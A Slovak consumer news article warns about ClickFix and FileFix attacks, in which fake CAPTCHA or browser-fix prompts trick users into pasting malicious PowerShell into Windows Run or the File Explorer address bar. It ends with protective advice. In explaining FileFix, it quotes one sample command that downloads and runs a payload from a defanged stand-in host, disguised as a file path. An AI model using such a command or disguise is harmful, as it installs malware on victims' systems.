Tento útok vyzerá ako nevinná oprava prehliadača. Falošné CAPTCHA ťa môžu pripraviť o celý systém
Nebezpečný útok ClickFix zneužíva tvoju dôveru aj clipboard, pozri sa, ako jednoducho sa môžeš stať obeťou a čo s tým robiť.
Internet dnes nie je len miestom plným informácií a zábavy, ale aj loviskom pre hackerov, ktorí sa snažia využiť tvoju nepozornosť. Jedným z najnovších a mimoriadne prefíkaných spôsobov útokov je ClickFix. Je to technika, ktorá na prvý pohľad vyzerá neškodne, no môže spôsobiť poriadne problémy. Upozornil na to portál Bleeping Computer.
Klikni, oprav a máš problém
Celé sa to začína celkom nevinne. Predstav si, že si googliš nejaký návod alebo stiahneš softvér z webu, ktorý vyzerá dôveryhodne. Naraz sa ti zobrazí výzva, napríklad falošný CAPTCHA formulár alebo „upozornenie“, že tvoj prehliadač má problém, ktorý treba „opraviť“. Klikneš na tlačidlo a ani o tom nevieš, ale do tvojej schránky (clipboardu) sa skopíruje škodlivý kód.
Útočníci vedia, že väčšina ľudí nepozerá, čo majú v schránke. Sú tak schopní presvedčiť ťa, aby si tento kód vložil do príkazového riadku. Napríklad Windows Run, ktorý spustíš cez Win + R. Takýmto spôsobom sa na tvojom zariadení spustí škodlivý skript, často napísaný v PowerShelli, ktorý môže stiahnuť ďalší škodlivý softvér a dať hackerom plný prístup k tvojmu systému.
V praxi už funguje a celkom dobre
Bezpečnostná firma Keep Aware nedávno zachytila reálny útok tohto typu. Používateľ klikol na falošný výsledok vo vyhľadávači, otvoril stránku, kde sa zobrazil falošný CAPTCHA rámik, klikol a systém bol takmer prelomený. Schránka bola naplnená PowerShell kódom, ktorý by po vložení spustil zadné vrátka (takzvaný RAT, teda Remote Access Trojan).
Našťastie v tomto prípade zasiahlo bezpečnostné riešenie, ktoré rozpoznalo podozrivú manipuláciu so schránkou a upozornilo používateľa skôr, ako sa niečo spustilo. Inak by mohol mať v počítači jeden z „tradičných“ malvérov ako AsyncRAT, Lumma Stealer alebo DarkGate.
Neprehliadni
Prichádza nová verzia: FileFix
Ako to už býva, keď niečo funguje, kyberzločinci sa snažia techniku vylepšiť. Najnovšia verzia útoku sa volá FileFix. Funguje podobne ako ClickFix, ale cieľom je tentokrát Prieskumník Windows. Používateľ je vyzvaný, aby niečo vložil priamo do panela s adresou v Prieskumníkovi.
To, čo vyzerá ako obyčajná cesta k súboru (napíklad Powershell.exe -c „iwr malicious[.]site/mal.jpg|iex“ # C:\Firma\Interné\Zmluva.pdf), je v skutočnosti maskovaný PowerShell príkaz, všetko pred # je reálny kód, zvyšok je iba komentár. Takto sa môže spustiť napríklad sťahovanie malvéru z webu, a používateľ ani len netuší, že niečo nie je v poriadku.
FileFix – A ClickFix Alternativehttps://t.co/OMU7UADf9J pic.twitter.com/Plqen4OAhS
— mr.d0x (@mrd0x) June 23, 2025
Ako sa útoku vyhnúť
Najlepšou ochranou je neklikať bez rozmyslu a nekopírovať príkazy z neoverených stránok. Ak ti niečo tvrdí, že máš problém s prehliadačom alebo že máš vložiť niečo do terminálu či adresného riadku, je to takmer určite pokus o útok. Seriózne weby a softvér ťa nikdy nebudú inštruovať týmto spôsobom.
Riešením je aj bezpečnostný softvér, ktorý priamo monitoruje, čo sa deje v prehliadači, napríklad Keep Aware, ktorý včas zachytí podozrivé správanie a zablokuje ho ešte predtým, ako dôjde ku škode.
ClickFix a jeho nástupca FileFix sú dôkazom toho, že útoky sa dnes nešíria len cez emaily alebo prílohy, ale priamo cez prehliadač a cez ľudskú dôverčivosť. Preto je dôležité mať oči na stopkách, používať zdravý rozum a sledovať, čo sa ti snažia jednotlivé weby „poradiť“.
